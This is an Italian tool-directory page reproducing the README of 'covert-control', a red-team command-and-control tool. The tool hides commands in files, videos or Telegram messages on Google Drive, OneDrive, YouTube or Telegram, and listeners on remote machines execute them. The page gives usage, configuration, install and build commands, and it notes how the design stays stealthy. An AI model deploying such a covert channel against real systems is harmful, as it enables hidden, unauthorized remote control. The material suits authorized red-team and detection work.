Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
covert-control — Google Drive, OneDrive e Youtube come canali occulti - Controlla sistemi da remoto caricando file su Google Drive, OneDrive, Youtube o Telegram | Kitploit
Strumenti/GitHubGitHub/ricardojoserf/covert-control
Strumenti di Crittografia/DecrittografiaEsfiltrazione DatiPost-ExploitCommand and ControlRed Teaming
GitHubricardojoserf/covert-control

covert-control

Google Drive, OneDrive e Youtube come canali occulti - Controlla sistemi da remoto caricando file su Google Drive, OneDrive, Youtube o Telegram

Vedi Repository
7184 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

covert-control

Controlla sistemi da remoto caricando file su Google Drive, OneDrive, Youtube o Telegram usando Python per creare i file e i listener. Permette di creare file di testo, immagini, audio o video, con i comandi in chiaro o crittografati usando AES.

  • covert-googledrive.py - Controlla sistemi caricando file in una cartella pubblica di Google Drive.

  • covert-onedrive.py - Controlla sistemi caricando file in una cartella pubblica di OneDrive.

  • covert-youtube.py - Controlla sistemi caricando video su Youtube (aggiornato da covert-tube).

  • covert-telegram.py - Controlla sistemi con un bot Telegram.

Crea file da caricare

Puoi trovare file di esempio nella cartella test_files o crearne di nuovi con generate_file.py:

root@kitploit:~
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
  • -t (--type) [Obbligatorio]: Tipi di file: "text", "image", "audio" o "video".

  • -o (--outputfile) [Opzionale]: File di output.

  • -c (--command) [Opzionale]: Comando da eseguire.

  • -e (--encrypted) [Opzionale]: Aggiungi questo flag per crittografare il comando con AES.

Esempi:

root@kitploit:~
python3 generate_file.py -t text  -c "whoami" -o text.txt
python3 generate_file.py -t text  -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e

Configurazione

Valori di configurazione comuni:

  • data_type (Opzionale. Default: "text"):

Valori di configurazione specifici:

  • googledrive_folder: URL della cartella pubblica di Google Drive da monitorare (per covert-googledrive.py).

  • onedrive_folder: URL della cartella pubblica di OneDrive da monitorare (per covert-onedrive.py).

  • youtube_channel_id: ID del canale Youtube da monitorare. Puoi ottenerlo da qui (per covert-youtube.py).

  • youtube_api_key: Ottieni una chiave API creando un'applicazione e generando la chiave qui (per covert-youtube.py).

  • telegram_token: Token del bot, crealo usando BotFather. Scrivi "/newbot", poi invia un nome per il bot (ad esempio, "botname") e un username per il bot che termina con "-bot" (ad esempio, "somethingrandombot") (per covert-telegram.py).

  • telegram_username: Specifica un username Telegram in modo che esegua solo i comandi ricevuti da questo utente (senza "@").


Google Drive

Permette di eseguire comandi caricando file di testo, immagini, audio e video, non crittografati o crittografati con AES. L'argomento di input opzionale è l'URL della cartella pubblica, che può essere configurato anche in config.py:

root@kitploit:~
python3 covert-googledrive.py [FOLDER_URL]

Il listener controllerà la cartella di Google Drive ogni 300 secondi per impostazione predefinita (può essere modificato in config.py). In questo caso viene caricato un video, "video.avi", con il comando nel QR del video:

img1

Dopo aver rilevato un nuovo file caricato nella cartella, viene scaricato, elaborato e i comandi vengono eseguiti:

img2


OneDrive

Permette di eseguire comandi caricando file di testo, immagini, audio e video, non crittografati o crittografati con AES. L'argomento di input opzionale è l'URL della cartella pubblica, che può essere configurato anche in config.py:

root@kitploit:~
python3 covert-onedrive.py [FOLDER_URL]

Il listener controllerà la cartella di OneDrive ogni 300 secondi per impostazione predefinita (può essere modificato in config.py). In questo caso viene caricato un audio, "audio_encrypted.wav", con il comando crittografato con AES:

img3

Dopo aver rilevato un nuovo file caricato nella cartella, viene scaricato, elaborato e i comandi vengono eseguiti:

img4

NOTA: Questo funzionerà solo se non elimini alcun file nella cartella; se lo fai, devi crearne una nuova. Sarebbe possibile implementarlo per funzionare anche dopo l'eliminazione dei file, ma sarebbe necessario creare molte richieste e sarebbe meno furtivo.


Youtube

Permette di eseguire comandi caricando video, non crittografati o crittografati con AES. Gli argomenti di input opzionali sono l'ID del canale Youtube da monitorare e la chiave API, che possono essere configurati anche in config.py:

root@kitploit:~
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]

Il listener controllerà il canale Youtube ogni 300 secondi per impostazione predefinita (può essere modificato in config.py). Prima viene caricato il video:

img5

Dopo aver rilevato un nuovo video nel canale, viene scaricato, elaborato e i comandi vengono eseguiti:

img6


Telegram

Controlla sistemi da remoto con un bot Telegram. Questa opzione non permette di caricare file, ma è possibile inviare i comandi in chiaro ("/cmd") o crittografati con AES ("/encrypted"). Il primo argomento di input opzionale è il token del bot, che può essere configurato anche in config.py; il secondo è usato per configurare un singolo utente Telegram che può inviare comandi al bot (senza "@"):

root@kitploit:~
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]

Il listener controllerà i comandi nella chat e mostrerà l'output:

root@kitploit:~
/cmd COMANDO_IN_CHIARO
/encrypted COMANDO_CRITTOGRAFATO_AES

img7


Installazione

root@kitploit:~
sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/

Creazione di binari standalone

root@kitploit:~
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
Scarica lo strumento
data_typeTipo di fileCrittografatoValido perEstensione
textFile di testoNoGoogle Drive, OneDrive.txt
text_encryptedFile di testoSìGoogle Drive, OneDrive.txt
imageImmagineNoGoogle Drive, OneDrive.png
image_encryptedImmagineSìGoogle Drive, OneDrive.png
audioAudioNoGoogle Drive, OneDrive.wav
audio_encryptedAudioSìGoogle Drive, OneDrive.wav
videoVideoNoGoogle Drive, OneDrive, Youtube.avi
video_encryptedVideoSìGoogle Drive, OneDrive, Youtube.avi
  • delay_seconds (Opzionale. Default: 300): Secondi tra i controlli di nuovi file caricati nella cartella di Google Drive o OneDrive o nuovi video nel canale Youtube.

  • aes_key (Opzionale. Default: "covert-control21"): Chiave per la crittografia AES.

  • debug (Opzionale. Default: True): Stampa messaggi e timestamp nel listener o meno.